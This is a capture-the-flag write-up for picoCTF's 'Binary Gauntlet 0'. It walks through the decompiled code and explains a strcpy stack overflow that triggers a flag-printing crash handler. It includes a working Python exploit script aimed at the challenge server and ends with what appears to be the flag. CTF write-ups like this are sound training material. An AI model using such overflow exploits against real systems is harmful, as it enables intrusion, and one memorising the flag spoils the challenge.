Binary Gauntlet 0
This series of problems has to do with binary protections and how they affect exploiting a very simple program. How far can you make it in the gauntlet?

Binary: gauntlet
Service: nc mercury.picoctf.net 37752
- 1. Decompile the binary using Ghidra.

`main` function:

```c
undefined8 main(void)
{
  char local_88 [108];
  __gid_t local_1c;
  FILE *local_18;
  char *local_10;

  local_10 = (char *)malloc(1000);
  local_18 = fopen("flag.txt","r");
  if (local_18 == (FILE *)0x0) {
    puts("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
    /* WARNING: Subroutine does not return */
    exit(0);
  }
  fgets(flag,0x40,local_18);
  signal(0xb,sigsegv_handler);
  local_1c = getegid();
  setresgid(local_1c,local_1c,local_1c);
  fgets(local_10,1000,stdin);
  local_10[999] = '\0';
  printf(local_10);
  fflush(stdout);
  fgets(local_10,1000,stdin);
  local_10[999] = '\0';
  strcpy(local_88,local_10);
  return 0;
}
```

`sigsegv_handler` function:

```c
void sigsegv_handler(void)
{
  fprintf(stderr,"%s\n",flag);
  fflush(stderr);
  /* WARNING: Subroutine does not return */
  exit(1);
}
```

- 2. As the decompilation shows, `signal(0xb, sigsegv_handler)` installs a SIGSEGV handler that prints the flag, so all we need is a crash. We can cause one by overflowing `local_88` when `local_10` is copied into it by `strcpy`: `local_10` is a 1000-byte heap buffer that we fill with the second `fgets`, while `local_88` is only 108 bytes on the stack, and `strcpy` does no bounds checking.
- 3. So send a single `a` for the first `fgets` (its input goes straight into `printf(local_10)`, a format-string bug that this level does not need), and then send well over 108 `a`s for the second `fgets`. Those `a`s are copied into the 108-byte `local_88` and overflow it. The crash itself happens when `main` returns: in Ghidra's naming, `local_88` sits 0x88 (136) bytes below the saved return address, so a couple of hundred `a`s is plenty to overwrite it. `main` then returns to 0x6161616161616161, a non-canonical address, the CPU faults, the kernel delivers SIGSEGV, and `sigsegv_handler` prints the flag.
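The two-line interaction described above, as an added example script that is not part of the original writeup. It uses only the standard-library `socket` module (no pwntools) and the sizes read off the Ghidra output; the extra padding of 64 bytes beyond the 0x88 offset is an assumption chosen so the saved return address is overwritten in full.

```python
import socket

# Values taken from the Ghidra decompilation on this page.
BUF_SIZE = 108      # sizeof(local_88)
RET_OFFSET = 0x88   # Ghidra's local_88 lies 0x88 bytes below the saved return address
PAD = 64            # assumption: extra bytes so the return address is fully clobbered


def build_payload(fill=b"a"):
    """Return the two input lines (without trailing newlines) that the exploit sends.

    Line 1 is a single harmless byte: it is passed straight to printf(local_10),
    and we do not use that format-string bug at this level.
    Line 2 is enough filler to run past local_88, the saved rbp and the return
    address, so that main returns into 0x6161... and faults with SIGSEGV.
    """
    line1 = fill
    line2 = fill * (RET_OFFSET + PAD)
    assert len(line2) > BUF_SIZE, "second line must overflow the 108-byte buffer"
    assert len(line2) < 999, "fgets only reads up to 999 bytes of the line"
    return line1, line2


def recv_all(sock, timeout=2.0):
    """Read until the remote side closes or goes quiet; the flag arrives on stderr,
    which the challenge service forwards over the same connection."""
    sock.settimeout(timeout)
    chunks = []
    try:
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    except socket.timeout:
        pass
    return b"".join(chunks)


def solve(host="mercury.picoctf.net", port=37752):
    """Send both lines and return everything the service printed, flag included."""
    line1, line2 = build_payload()
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(line1 + b"\n")   # answers the first fgets (echoed back by printf)
        s.sendall(line2 + b"\n")   # answers the second fgets, then strcpy overflows
        return recv_all(s)


if __name__ == "__main__":
    print(solve().decode(errors="replace"))
```

`build_payload` is kept separate from the network code so the payload shape can be checked offline; run the script as-is to talk to the challenge service.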
9595dc79e46ae416c5383d858afbb624